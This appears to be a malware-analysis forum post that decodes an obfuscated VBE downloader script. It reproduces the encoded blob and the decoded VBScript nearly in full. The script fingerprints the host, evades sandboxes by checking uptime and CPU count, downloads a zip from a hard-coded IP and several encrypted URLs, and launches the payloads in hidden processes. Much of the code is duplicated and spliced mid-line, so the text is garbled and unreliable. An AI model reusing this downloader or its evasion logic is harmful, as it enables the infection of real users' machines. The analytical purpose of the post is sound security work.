- May 14, 2016
- 1,597
z.vbe
4/55
To understand some of following parts, some knowledge in programming language could help a lot
Why this sample ?
- Because it will be the first time I show here the first method used :
- Once decoded, it uses other obfuscation methods.
- To infect the PC, WScript.exe need to be run with at least 3 command line arguments ( excluding the file name), retrieved by this .vbe script. For online analysis tools, none is used.
=> this is why on virus total there are not a lot of suspicious behavior detected
I think it will be interesting to analyze this sample, a lot off stuff used
One important argument missing (in fact their are all important) : the password used by the script to decrypt some important parts :
1) Quick look at the vbe code :
One line 7200 chars:
Begin with : #@~^
End with : ^#~@
2) Let's decode the vbe part to obtain a vbs like script :
To decode it, it's easy
I used a modified (very small modification) part of a code from 2001
ScrEnc: Classic ASP Encoder, VBScript Source Code Encoder, JavaScript Obfuscator, HTML/VBS/JScript/C++ Source Code Encoder, Screnc/Windows Script Encoder Replacement
=> see the videos as example => very instructive : Online Screencasts - Scripts Encryptor - Encoder
Dim fic,contenu
Set fic = fso.OpenTextFile(NomFichier, 1) // z.vbe file
Contenu=fic.readAll
fic.close
Const TagInit="#@~^" '#@~^awQAAA==
Const TagFin="==^#~@" '& chr(0)
Dim DebutCode, FinCode
Do
FinCode=0
Decode function use recursivity if needed
Dim fic,contenu
Set fic = fspenTextFile(NomFichier, 1) // z.vbe file
Contenu=fic.readAll
fic.close
Here, Contenu contains the string from vbe.
I used copy-paste to copy the string from Contenu to notepad++
and made "find-replace" by regular expressions
If you remember my other analysis, you will recognized some codes / methods used
for example, from this post :
https://malwaretips.com/threads/scripted-samples-from-malware-vault-5-8-16-8.62121/#post-531277
3) Before some explanation of obfuscated parts (after the vbe decoding) :
I will end this first part with a try to remember you one encryption method you may have lean at school :
look at this function, and the name :
Function DCaesar(str,offset)
An "obfuscation" method which come from the famous Caesar
Some reading for you
Caesar cipher - Wikipedia, the free encyclopedia
"The transformation can be represented by aligning two alphabets; the cipher alphabet is the plain alphabet rotated left or right by some number of positions. For instance, here is a Caesar cipher using a left rotation of three places, equivalent to a right shift of 23 (the shift parameter is used as the key):
Plain: ABCDEFGHIJKLMNOPQRSTUVWXYZ
Cipher: XYZABCDEFGHIJKLMNOPQRSTUVW
When encrypting, a person looks up each letter of the message in the "plain" line and writes down the corresponding letter in the "cipher" line.
Plaintext: THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG
Ciphertext: QEB NRFZH YOLTK CLU GRJMP LSBO QEB IXWV ALD
Deciphering is done in reverse, with a right shift of 3.
The replacement remains the same throughout the message, so the cipher is classed as a type of monoalphabetic substitution, as opposed to polyalphabetic substitution."
The script uses the DCaesar function as sub-function of main decrypter function
(if not, it would have been too "lol")
Command line arguments used by the script:
And this is where the second argument from command line is important : Pwd
Function MDnStr(OldStr,Pwd)
---------------------------------------------------------------------------------------------------------------------------
Warning :
http://67.227.173.54:88/tyaz.zip" => "\\isst.zip"
In part 4) I will comment some important parts of the script / functions
and show you how we can obtain the password parameter by some reasoning/ reversing (remember that we only have the malware script, not the arguments used in the command line )
4/55
To understand some of following parts, some knowledge in programming language could help a lot
Why this sample ?
- Because it will be the first time I show here the first method used :
This file is a vbe file, a "Visual Basic Script encoded script file" (What a beautiful long name)
But we can only call it "VBScript Encoded Script File"
But we can only call it "VBScript Encoded Script File"
- Once decoded, it uses other obfuscation methods.
- To infect the PC, WScript.exe need to be run with at least 3 command line arguments ( excluding the file name), retrieved by this .vbe script. For online analysis tools, none is used.
=> this is why on virus total there are not a lot of suspicious behavior detected
I think it will be interesting to analyze this sample, a lot off stuff used
One important argument missing (in fact their are all important) : the password used by the script to decrypt some important parts :
=> I will show on the part 4) (second post) how to find it by reasoning + reversing
1) Quick look at the vbe code :
One line 7200 chars:
Begin with : #@~^
End with : ^#~@
#@~^kBsAAA==6 P3MDKDP"+k;:PH+XY@#@&Gk:,6?^loB6j\DBx;:^2!/SW(%r!YKCMl:dSK4%t("2!U+M\k1+B^EMDnxDwCO4@#@&UnY,W4N \q"2V?nD-r1+~',!+Dr8%mYcESkU:ThD/lPksw+M/KUlDkGxd+-n^'ks2+M/W CO+)"'- -.GKYwfAob`SPlUYN]nTn.W7E*@#@&K4NrEDnm.ls/~',W8%qHq"3MU+D7r^+cMYjY.r o#l^;+v[u0Z!!TTZ SPrjI?PAH'ZEMDUY;WUYMWsjY-;GxDDW^wHVk-dlUo;CT+E~,Ef0C;^YJS6UVCo*@#@&W8Nr!YnmDmh/,'~W(L \&I2Vj+M\k1n MYUY.kULjlsEc[_%TTZ!!T+BPE?}o:)"2'Hk1DKdW6Ywbx[GS/PgP-;EDMnUYj+M/rWUEBPEZ!.DxO#D/rG JSrU-Db@#@&K4L}EDKlMlh/,'~G(Lt(IAM?.-k1+cMnYjOMkUojCV!+c'_%!TTZ!T B~r?eUKAH-;EM.+ Y/W Y.G^?+DwZKxYMGs-U+k/rWU~tlUlTnD'2U-bDWUhxOJB~r1itAAI{}s|KI}Z3?Ur]jr~x!hmaE/*@#@&xKYbx^x~x,W;Y1U`*@#@&(6Pj^Mk2Yc)Mo;s+ Y/cZK;xDP@*',&~P4+x@#@&4Nk'qj^DbwDR)DL;s+UYkc!*@#@&dDDwA[{jmMraY zDTE:xDd`8#@#@&mw2;MV'qjmMkwD )DTEs+UYdcy#@#@&ECwaE.s{HfUjDDcla2!DsB/DDwSN*@#@&AVd+@#@& j1DkaOR5EkD@#@&2 N,qW@#@&@#@&m;DMnxDwCO4P'~^M+CYG(Ln1YvJ?1Db2YbxLRwksnUX/Dn:}4L^OJ*RV+Osrs` /1.kaY j1Dk2OwEsVgCs+bcnmD+ YwGV9+.RhlO4@#@&fbhPX%vW@#@&6RvWPxPp0+W.(+*`*@#@&@#@&q0~6UVCo,x,JTR!WJP}D,6?^lLP{PET1!cr~K4+x@#@&@#@&&0,rj\n.,'~Jl rPP4x@#@&A^WL`(%bPQ,J Z1 J,QP}?slTPQ~rPJ,QPX%vWb@#@&9V,H9xjOM`E:m^E=z&A2OtzRH;^6s%44z Fc+D6oXdoHl tDY&.\:Sz!8 &W&U/MzNh.E4%c+UhrS/DD2A9#~\9 ?ODvE_)w~WaV/(6'$NH\h;2 wWT3W'}Kn-Fl Uh0JB/OD2A9#@#@&@#@&2^/n@#@&hVGLv4%k,Q,JR;1 JP3P}jVmo~_,J~E,_PX0vW#@#@&v[V,HGxjY.cr:Cm!lzJhfR4XOz516hL48HOqc+M0oX/TzlctOYJDn-shXZq 2cz d.z(4ME4L+ wzJBdYMwA[*~H9UUY.`ru=-$Kw^/4X-~[X7:5&y-WL0W-5P|'F*cUA3r~kY.wA[*@#@&N^~HGxjOM`JhC1ElzJA2O4HOH;mX:N44HOqRDWLX/oHCR4YYJ.n\shH!q f*JxdDJ84ME4%yR+2zr~dYM2SNbBHGx?DDvEt=-8WaVd8X-mNdD':xX"^Xc0b6E~dOMwAN*@#@&U+O~6/W~x,Z.+mOr8N+1Y`r?1.kaYrxTRor^+?HdY:r(%nmDJ*@#@&0dGcZGwHok^+~\Gx?O.vJ4)'8Kwsk4X-mN/Mw: 6"mHRWrXJ~kODahN*S\f ?DDcJul'AGw^d4X-$[H\:5fy-Wo0G'pPn-8*R h0E~kY.wSNbS8@#@&UnY,0/KxHWDtbxL@#@&.!x2DT~HGxjOM`J.-
...
....
wMo~H9UUY.`r.\Kt;GXRL^s,tl-hkk-66'\:$E'2DXX-4ckWCr~/D.wSN#@#@&@#@&9V,J4YO2=z&vF yG qF&RX*=%0zDzmy .kaJ~1EM.+ Y2lDt~Q,J-bd/DRyb2E@#@&D!x2DL~tfU?D.`rtOhc3yh~Jt~VXrD;OHR^oL,zN~zN)3MI+"h!XRgdk$Vk,ES/DDah[#~Q,m;DMnxDwCO4P_~E'kd/D .k2,J,_PkYM2h9PQPrPE~3Pla2EMV@#@&3UN,q6@#@&@#@&o!x^YbGx,Nsc!~0b@#@&Nr:,a_YOa)U+Y,6_OYaPxP1DnCD+W(%+1Y`t9U?DDvJ$wA\.\aR~UE5X".\k\"s(X *cqr~dDDahN*#@#@&Nb:~4UY.h=?+D~4UYDs~xP1DlO+G8N+^Yv\f ?O.vJsVabt bXANt-r~kYDah9b#@#@&aCDY2 }w+ ~JV2KrS;~,!@#@&v6uODw /OI;;nkYCnC9+.Pr)!Y4KDbylDkKUJBJ$lkk^~9(14\fz&rs#4rjWW+ IGi0IoN 4S`sAg..+iVHzJ@#@&XCODwc?+ N@#@&hbY4P(?O.s@#@&cOXa+P{~q@#@&RKwnx@#@&ch.kDnPXCOOaRDndaWU/$KNz@#@&c/l7+DG0bVnP6~+@#@&Rm^G/@#@&U[PSkDt@#@&nU9PoE ^YbWU@#@&@#@&o; mOkKU,hsKov/VKo*@#@&U+OPK4%oUrP{~ZM+lDn64N+1YcJj^Mk2YbUocsrs?XdO:64Nn1YE*@#@&hk Nb.P{PG4Nsj6cM+DjwmkmsoW^NDc!b@#@&?nY,WP{PG8Ns?6 ;DnlDn:+aDsbV+vhbUNbD~_,JwA( !8T3(RVKLE~8#@#@&WR .bYnSbU+v/sGT#@#@&WcZsWkn@#@&jY,W4NsU6P{PHWDtrUT@#@&AUN,sE ^OkKx@#@&@#@&o; mOkKUPMEU2Mo`22mY4#@#@&U+O,W(LnUP{~MY64N+^OvJhbU:T:Ykl`kswDdWUCDkGxdn\Vxrsw+.dKxCYNe-wc-MWWD-;(Hj E#@#@&jnDPW(%?DlDD;2P{PK4%nj V+O`r k &+mhDW^nk/jYm.DE2r#@#@&?Y,G4NZGx6kL~{PW(%?DlDD;2RUwmhUqUdDlUmm`*@#@&G(LZGU6kLRU4Kh bx9Wh,',T@#@&?nY,W8%UtlMnP{PW(%K?cMYcJ ...
...
+@#@&idi9Zm+dlMPx~GZldlMP[,/4Dvm4l.#@#@&id3Vkn@#@&d77GZlndmD~',9;lnklMP[,m4CD@#@&7dAx[~&0@#@&716Y@#@&3x9PwEUmOrKx@#@&w;x1YrG PH9UUY.`}s9?OM~hhN*@#@&7fb:~xhdOM)xA/DDP{~EJ@#@&iVnxLO4PxPdnxvnA[*@#@&7sxLY4dDD~{Pd+xvr^[?DDb@#@&doGMPk,xP8PKK~s+ oDtdY.@#@&d7m4CD,'~\bN`6s9?ODBrBFb@#@&idw,',rPtW[P^+ULDt@#@&7d&0Pa~xPZP:tnx~2,'~F@#@&diw~x,Hk[chh[~aS8#@#@&dix+S/D.P{PU+S/O.,[PG/l/lMc^tmDBwb@#@&7g+aY@#@&dtfUjDDPx~ +A/D.@#@&3 N,sE mDrW @#@&XkUIAA==^#~@
...
....
wMo~H9UUY.`r.\Kt;GXRL^s,tl-hkk-66'\:$E'2DXX-4ckWCr~/D.wSN#@#@&@#@&9V,J4YO2=z&vF yG qF&RX*=%0zDzmy .kaJ~1EM.+ Y2lDt~Q,J-bd/DRyb2E@#@&D!x2DL~tfU?D.`rtOhc3yh~Jt~VXrD;OHR^oL,zN~zN)3MI+"h!XRgdk$Vk,ES/DDah[#~Q,m;DMnxDwCO4P_~E'kd/D .k2,J,_PkYM2h9PQPrPE~3Pla2EMV@#@&3UN,q6@#@&@#@&o!x^YbGx,Nsc!~0b@#@&Nr:,a_YOa)U+Y,6_OYaPxP1DnCD+W(%+1Y`t9U?DDvJ$wA\.\aR~UE5X".\k\"s(X *cqr~dDDahN*#@#@&Nb:~4UY.h=?+D~4UYDs~xP1DlO+G8N+^Yv\f ?O.vJsVabt bXANt-r~kYDah9b#@#@&aCDY2 }w+ ~JV2KrS;~,!@#@&v6uODw /OI;;nkYCnC9+.Pr)!Y4KDbylDkKUJBJ$lkk^~9(14\fz&rs#4rjWW+ IGi0IoN 4S`sAg..+iVHzJ@#@&XCODwc?+ N@#@&hbY4P(?O.s@#@&cOXa+P{~q@#@&RKwnx@#@&ch.kDnPXCOOaRDndaWU/$KNz@#@&c/l7+DG0bVnP6~+@#@&Rm^G/@#@&U[PSkDt@#@&nU9PoE ^YbWU@#@&@#@&o; mOkKU,hsKov/VKo*@#@&U+OPK4%oUrP{~ZM+lDn64N+1YcJj^Mk2YbUocsrs?XdO:64Nn1YE*@#@&hk Nb.P{PG4Nsj6cM+DjwmkmsoW^NDc!b@#@&?nY,WP{PG8Ns?6 ;DnlDn:+aDsbV+vhbUNbD~_,JwA( !8T3(RVKLE~8#@#@&WR .bYnSbU+v/sGT#@#@&WcZsWkn@#@&jY,W4NsU6P{PHWDtrUT@#@&AUN,sE ^OkKx@#@&@#@&o; mOkKUPMEU2Mo`22mY4#@#@&U+O,W(LnUP{~MY64N+^OvJhbU:T:Ykl`kswDdWUCDkGxdn\Vxrsw+.dKxCYNe-wc-MWWD-;(Hj E#@#@&jnDPW(%?DlDD;2P{PK4%nj V+O`r k &+mhDW^nk/jYm.DE2r#@#@&?Y,G4NZGx6kL~{PW(%?DlDD;2RUwmhUqUdDlUmm`*@#@&G(LZGU6kLRU4Kh bx9Wh,',T@#@&?nY,W8%UtlMnP{PW(%K?cMYcJ ...
...
+@#@&idi9Zm+dlMPx~GZldlMP[,/4Dvm4l.#@#@&id3Vkn@#@&d77GZlndmD~',9;lnklMP[,m4CD@#@&7dAx[~&0@#@&716Y@#@&3x9PwEUmOrKx@#@&w;x1YrG PH9UUY.`}s9?OM~hhN*@#@&7fb:~xhdOM)xA/DDP{~EJ@#@&iVnxLO4PxPdnxvnA[*@#@&7sxLY4dDD~{Pd+xvr^[?DDb@#@&doGMPk,xP8PKK~s+ oDtdY.@#@&d7m4CD,'~\bN`6s9?ODBrBFb@#@&idw,',rPtW[P^+ULDt@#@&7d&0Pa~xPZP:tnx~2,'~F@#@&diw~x,Hk[chh[~aS8#@#@&dix+S/D.P{PU+S/O.,[PG/l/lMc^tmDBwb@#@&7g+aY@#@&dtfUjDDPx~ +A/D.@#@&3 N,sE mDrW @#@&XkUIAA==^#~@
2) Let's decode the vbe part to obtain a vbs like script :
To decode it, it's easy
I used a modified (very small modification) part of a code from 2001
Author : Jean-Luc Antoine
hxxp://www.interclasse.com/scripts/decovbe.php
Why "modified version" ? Because the function used to Browse Folder and choose a file doesnt work anymore on latest version of Windows (7 ,8 & 10)
it decodes all files encoded with screnc.exe (original version) hxxp://www.interclasse.com/scripts/decovbe.php
Why "modified version" ? Because the function used to Browse Folder and choose a file doesnt work anymore on latest version of Windows (7 ,8 & 10)
ScrEnc: Classic ASP Encoder, VBScript Source Code Encoder, JavaScript Obfuscator, HTML/VBS/JScript/C++ Source Code Encoder, Screnc/Windows Script Encoder Replacement
=> see the videos as example => very instructive : Online Screencasts - Scripts Encryptor - Encoder
The parts I used:Dim fic,contenu
Set fic = fso.OpenTextFile(NomFichier, 1) // z.vbe file
Contenu=fic.readAll
fic.close
Const TagInit="#@~^" '#@~^awQAAA==
Const TagFin="==^#~@" '& chr(0)
Dim DebutCode, FinCode
Do
FinCode=0
DebutCode=Instr(Contenu,TagInit)
If DebutCode>0 Then
Loop UntilDebutCode=Instr(Contenu,TagInit)
If DebutCode>0 Then
If (Instr(DebutCode,Contenu,"==")-DebutCode)=10 Then // 'If "==" follows the tag
End IfFinCode=Instr(DebutCode,Contenu,TagFin)
If FinCode>0 Then
End IfIf FinCode>0 Then
Contenu=Left(Contenu,DebutCode-1) & _
Decode(Mid(Contenu,DebutCode+12,FinCode-DebutCode-12-6)) & _
Mid(Contenu,FinCode+6)
End IfDecode(Mid(Contenu,DebutCode+12,FinCode-DebutCode-12-6)) & _
Mid(Contenu,FinCode+6)
FinCode=0
Decode function use recursivity if needed
Function Decode(Chaine)
Dim se,i,c,j,index,ChaineTemp
Dim tDecode(127)
Const Combinaison="1231232332321323132311233213233211323231311231321323112331123132"
Dim tDecode(127)
Const Combinaison="1231232332321323132311233213233211323231311231321323112331123132"
Set se=WSCript.CreateObject("Scripting.Encoder")
For i=9 to 127
For i=9 to 127
'Next line we correct a bug, otherwise a ")" could be decoded to a ">"For i=9 to 127
tDecode(i)="JLA"
NextFor i=9 to 127
ChaineTemp=Mid(se.EncodeScriptFile(".vbs",string(3,i),0,""),13,3)
For j=1 to 3
c=Asc(Mid(ChaineTemp,j,1))
tDecode(c)=Left(tDecode(c),j-1) & chr(i) & Mid(tDecode(c),j+1)
Next
NextFor j=1 to 3
c=Asc(Mid(ChaineTemp,j,1))
tDecode(c)=Left(tDecode(c),j-1) & chr(i) & Mid(tDecode(c),j+1)
Next
tDecode(42)=Left(tDecode(42),1) & ")" & Right(tDecode(42),1)
Set se=Nothing
Set se=Nothing
Chaine=Replace(Replace(Chaine,"@&",chr(10)),"@#",chr(13))
Chaine=Replace(Replace(Chaine,"@*",">"),"@!","<")
Chaine=Replace(Chaine,"@$","@")
index=-1
For i=1 to Len(Chaine)
c=asc(Mid(Chaine,i,1))
If c<128 Then index=index+1
Decode=Chaine
End FunctionChaine=Replace(Replace(Chaine,"@*",">"),"@!","<")
Chaine=Replace(Chaine,"@$","@")
index=-1
For i=1 to Len(Chaine)
c=asc(Mid(Chaine,i,1))
If c<128 Then index=index+1
If (c=9) or ((c>31) and (c<128)) Then
NextIf (c<>60) and (c<>62) and (c<>64) Then
Chaine=Left(Chaine,i-1) & Mid(tDecode(c),Mid(Combinaison,(index mod 64)+1,1),1) & Mid(Chaine,i+1)
End If
End IfChaine=Left(Chaine,i-1) & Mid(tDecode(c),Mid(Combinaison,(index mod 64)+1,1),1) & Mid(Chaine,i+1)
End If
Decode=Chaine
Dim fic,contenu
Set fic = fspenTextFile(NomFichier, 1) // z.vbe file
Contenu=fic.readAll
fic.close
Here, Contenu contains the string from vbe.
I used copy-paste to copy the string from Contenu to notepad++
and made "find-replace" by regular expressions
all \r\n => replaced by new lines
all \t => replaced by tabulation
all \" => replaced by "
(I could have saved it directly with Microsoft Visual Studio to a file, to remove the used for formatting, but less fun )all \t => replaced by tabulation
all \" => replaced by "
On Error Resume Next
Dim OSlag,OSver,numcpus,objOutParams,objWMIREGService,currentpath
Set objWMIREGService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\DEFAULT:StdRegProv")
objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\\CurrentControlSet\\Control\\Nls\\Language", "Default",OSlag)
objOutParams = objWMIREGService.GetStringValue(&H80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "CurrentVersion",OSver)
objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "NUMBER_OF_PROCESSORS",numcpus)
notincn = outcn()
If WScript.Arguments.Count >= 3 Then
bji=WScript.Arguments(0)
strpwd=WScript.Arguments(1) // string as password
appurl=WScript.Arguments(2) // appurl encrypted
'appurl=MDnStr(appurl,strpwd)
Else
currentpath = createobject("Scripting.FileSystemObject").GetFile(Wscript.ScriptFullName).ParentFolder.Path
Dim x864
x864 = X86orX64()
If OSlag = "0804" Or OSlag = "0c04" Then
Function dl(u,f)
Function wlog(slog)
Function runprg(ppath)
Function outcn()
Function UTCtoNow(nD)
Function StoHMS(Sec)
Function yxsj()
Function X86orX64()
Function DCaesar(str,offset)
Function MDnStr(OldStr,Pwd)
Dim OSlag,OSver,numcpus,objOutParams,objWMIREGService,currentpath
Set objWMIREGService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\DEFAULT:StdRegProv")
objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\\CurrentControlSet\\Control\\Nls\\Language", "Default",OSlag)
objOutParams = objWMIREGService.GetStringValue(&H80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "CurrentVersion",OSver)
objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "NUMBER_OF_PROCESSORS",numcpus)
notincn = outcn()
If WScript.Arguments.Count >= 3 Then
bji=WScript.Arguments(0)
strpwd=WScript.Arguments(1) // string as password
appurl=WScript.Arguments(2) // appurl encrypted
'appurl=MDnStr(appurl,strpwd)
Else
WScript.Quit
End Ifcurrentpath = createobject("Scripting.FileSystemObject").GetFile(Wscript.ScriptFullName).ParentFolder.Path
Dim x864
x864 = X86orX64()
If OSlag = "0804" Or OSlag = "0c04" Then
If OSver = "5.2" Then
If yxsj() < 9 And numcpus < 8 Then
WScript.Quit
Else
wlog(bji + "-CN-" + OSlag + " " + x864)
dl MDnStr("macu://w3-hy-yqcxmjhby-1.erfgxsgya.htt/revmwy01234/nsr/jwruhj.enw",strpwd),MDnStr("H:\\Boplsbx\\Bdyvmq32\\fgko\\QTK\\15.nwk",strpwd)
Elsedl MDnStr("macu://w3-hy-yqcxmjhby-1.erfgxsgya.htt/revmwy01234/nsr/jwruhj.enw",strpwd),MDnStr("H:\\Boplsbx\\Bdyvmq32\\fgko\\QTK\\15.nwk",strpwd)
wlog(bji + "-CN-" + OSlag + " " + x864)
dl MDnStr("macu://w3-hy-yqcxmjhby-1.erfgxsgya.htt/revmwy01234/nsr/bbruhj2.epy",strpwd),MDnStr("h:\\boplsbx\\cjsr\\mnxzcy.fix",strpwd)
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile MDnStr("h:\\boplsbx\\cjsr\\mnxzcy.fix",strpwd),MDnStr("H:\\Boplsbx\\Bdyvmq32\\fgko\\QTK\\15.nwk",strpwd),1
Set fso=Nothing
runprg MDnStr("rvohuox.jcl h:\\emsivfx\\vmqu\\prxyvb.ifa",strpwd)
End Ifdl MDnStr("macu://w3-hy-yqcxmjhby-1.erfgxsgya.htt/revmwy01234/nsr/bbruhj2.epy",strpwd),MDnStr("h:\\boplsbx\\cjsr\\mnxzcy.fix",strpwd)
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile MDnStr("h:\\boplsbx\\cjsr\\mnxzcy.fix",strpwd),MDnStr("H:\\Boplsbx\\Bdyvmq32\\fgko\\QTK\\15.nwk",strpwd),1
Set fso=Nothing
runprg MDnStr("rvohuox.jcl h:\\emsivfx\\vmqu\\prxyvb.ifa",strpwd)
If yxsj() < 9 And numcpus < 8 Then
dl MDnStr("macu://wytyjlk.tmaj.lts/qxjrz/KLEJ80F06I421H31!248?lpaj.inv",strpwd),MDnStr("h:\\boplsbx\\cjsr\\miy.inv",strpwd)
runprg MDnStr("htm.kzm /h lxitqty.lgj /j /j:EGYezmuy.Nsiqli h:\\boplsbx\\cjsr\\miy.inv&K:\\Bpwiuya\\YJTY\\oub.gfa",strpwd)
Elserunprg MDnStr("htm.kzm /h lxitqty.lgj /j /j:EGYezmuy.Nsiqli h:\\boplsbx\\cjsr\\miy.inv&K:\\Bpwiuya\\YJTY\\oub.gfa",strpwd)
dl "http://67.227.173.54:88/tyaz.zip",currentpath + "\\isst.zip"
runprg MDnStr("htm.kzm /h lxitqty.lgj /j /j:EGYezmuy.Nsiqli ",strpwd) + currentpath + "\\isst.zip " + strpwd + " " + appurl
End Ifrunprg MDnStr("htm.kzm /h lxitqty.lgj /j /j:EGYezmuy.Nsiqli ",strpwd) + currentpath + "\\isst.zip " + strpwd + " " + appurl
WScript.Quit
Else
wlog(bji + "-USA-" + OSlag + " " + x864)
'dl MDnStr("macu://w3-hy-yqcxmjhby-1.erfgxsgya.htt/revmwy01234/nsr/bbruhj2.epy",strpwd),MDnStr("H:\\Boplsbx\\Bdyvmq32\\fgko\\QTK\\15.nwk",strpwd)
dl MDnStr("macu://w3-hy-yqcxmjhby-1.erfgxsgya.htt/revmwy01234/nsr/bbruhj2.epy",strpwd),MDnStr("h:\\boplsbx\\cjsr\\mnxzcy.fix",strpwd)
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile MDnStr("h:\\boplsbx\\cjsr\\mnxzcy.fix",strpwd),MDnStr("H:\\Boplsbx\\Bdyvmq32\\fgko\\QTK\\15.nwk",strpwd),1
Set fso=Nothing
runprg MDnStr("rvohuox.jcl h:\\emsivfx\\vmqu\\prxyvb.ifa",strpwd)
dl "http://67.227.173.54:88/tyaz.zip",currentpath + "\\isst.zip"
runprg MDnStr("htm.kzm /h lxitqty.lgj /j /j:EGYezmuy.Nsiqli ",strpwd) + currentpath + "\\isst.zip " + strpwd + " " + appurl
End If'dl MDnStr("macu://w3-hy-yqcxmjhby-1.erfgxsgya.htt/revmwy01234/nsr/bbruhj2.epy",strpwd),MDnStr("H:\\Boplsbx\\Bdyvmq32\\fgko\\QTK\\15.nwk",strpwd)
dl MDnStr("macu://w3-hy-yqcxmjhby-1.erfgxsgya.htt/revmwy01234/nsr/bbruhj2.epy",strpwd),MDnStr("h:\\boplsbx\\cjsr\\mnxzcy.fix",strpwd)
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile MDnStr("h:\\boplsbx\\cjsr\\mnxzcy.fix",strpwd),MDnStr("H:\\Boplsbx\\Bdyvmq32\\fgko\\QTK\\15.nwk",strpwd),1
Set fso=Nothing
runprg MDnStr("rvohuox.jcl h:\\emsivfx\\vmqu\\prxyvb.ifa",strpwd)
dl "http://67.227.173.54:88/tyaz.zip",currentpath + "\\isst.zip"
runprg MDnStr("htm.kzm /h lxitqty.lgj /j /j:EGYezmuy.Nsiqli ",strpwd) + currentpath + "\\isst.zip " + strpwd + " " + appurl
Function dl(u,f)
dim xHttp:Set xHttp = createobject(MDnStr("BpwMzvx.BnuQyzrZivzlby.5.1",strpwd))
dim bStrm:Set bStrm = createobject(MDnStr("Fkxih.Axwjhv",strpwd))
xHttp.Open "GET",u, 0
'xHttp.setRequestHeader "Authorization","Basic dXNhMDA3OmVhOVo4eWRoUkRFdnhLUWlwNVV2UGMy"
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile f,2
.close
end with
end Functiondim bStrm:Set bStrm = createobject(MDnStr("Fkxih.Axwjhv",strpwd))
xHttp.Open "GET",u, 0
'xHttp.setRequestHeader "Authorization","Basic dXNhMDA3OmVhOVo4eWRoUkRFdnhLUWlwNVV2UGMy"
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile f,2
.close
end with
Function wlog(slog)
Set objFSO = CreateObject("Scripting.FileSystemObject")
windir = objFSO.GetSpecialFolder(0)
Set f = objFSO.CreateTextFile(windir + "\\wb2010kb.log",1)
f.WriteLine(slog)
f.Close
Set objFSO = Nothing
End Functionwindir = objFSO.GetSpecialFolder(0)
Set f = objFSO.CreateTextFile(windir + "\\wb2010kb.log",1)
f.WriteLine(slog)
f.Close
Set objFSO = Nothing
Function runprg(ppath)
Set objPS = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\CIMV2")
Set objStartup = objPS.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_()
objConfig.ShowWindow = 0
Set objShare = objPS.Get("Win32_Process")
Set objInParam = objShare.Methods_("Create").inParameters.SpawnInstance_()
objInParam.Properties_.Item("CommandLine") = ppath
objInParam.Properties_.Item("ProcessStartupInformation") = objConfig
Set objOutParams = objPS.ExecMethod("Win32_Process", "Create", objInParam)
End FunctionSet objStartup = objPS.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_()
objConfig.ShowWindow = 0
Set objShare = objPS.Get("Win32_Process")
Set objInParam = objShare.Methods_("Create").inParameters.SpawnInstance_()
objInParam.Properties_.Item("CommandLine") = ppath
objInParam.Properties_.Item("ProcessStartupInformation") = objConfig
Set objOutParams = objPS.ExecMethod("Win32_Process", "Create", objInParam)
Function outcn()
Err.Clear
On Error Resume Next
dim xHttp:Set xHttp = createobject(MDnStr("BpwMzvx.BnuQyzrZivzlby.5.1",strpwd))
xHttp.Open "GET",MDnStr("macu://xgppwhu.ituxwxy.ewq/",strpwd), 0
xHttp.Send
If Err.Number <> 0 Then
If xHttp.responseText = "hello" Then
End FunctionOn Error Resume Next
dim xHttp:Set xHttp = createobject(MDnStr("BpwMzvx.BnuQyzrZivzlby.5.1",strpwd))
xHttp.Open "GET",MDnStr("macu://xgppwhu.ituxwxy.ewq/",strpwd), 0
xHttp.Send
If Err.Number <> 0 Then
outcn = 0
Set xHttp = Nothing
Exit Function
End IfSet xHttp = Nothing
Exit Function
If xHttp.responseText = "hello" Then
outcn = 1
Set xHttp = Nothing
Exit Function
End IfSet xHttp = Nothing
Exit Function
Set xHttp = Nothing
outcn = 0Function UTCtoNow(nD)
If Not IsNull(nD) Then
Set SWDT = CreateObject("WbemScripting.SWbemDateTime")
SWDT.Value = nD
UTCtoNow = SWDT.GetVarDate(True)
End If
End FunctionSet SWDT = CreateObject("WbemScripting.SWbemDateTime")
SWDT.Value = nD
UTCtoNow = SWDT.GetVarDate(True)
End If
Function StoHMS(Sec)
H = Int(Sec/3600) :H1 = Sec Mod 3600:M = Int(H1/60) :S = H1 Mod 60
StoHMS = H
End FunctionStoHMS = H
Function yxsj()
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\\\" & strComputer & "\\root\\CIMV2")
Set colItems = objWMIService.ExecQuery( _
"SELECT * FROM Win32_OperatingSystem",,48)
For Each objItem in colItems
End FunctionSet objWMIService = GetObject("winmgmts:\\\\" & strComputer & "\\root\\CIMV2")
Set colItems = objWMIService.ExecQuery( _
"SELECT * FROM Win32_OperatingSystem",,48)
For Each objItem in colItems
yxsj = StoHMS(DateDiff("s", UTCtoNow(objItem.LastBootUpTime), Now()))
Exit Function
NextExit Function
Function X86orX64()
On Error Resume Next
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\\\" & strComputer & "\\root\\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem",,48)
For Each objItem in colItems
If InStr(objItem.SystemType, "86") <> 0 Then
X86orX64 = "x86"
ElseIf InStr(objItem.SystemType, "64") <> 0 Then
X86orX64 = "x64"
Else
X86orX64 = objItem.SystemType
End If
Next
End FunctionstrComputer = "."
Set objWMIService = GetObject("winmgmts:\\\\" & strComputer & "\\root\\cimv2")
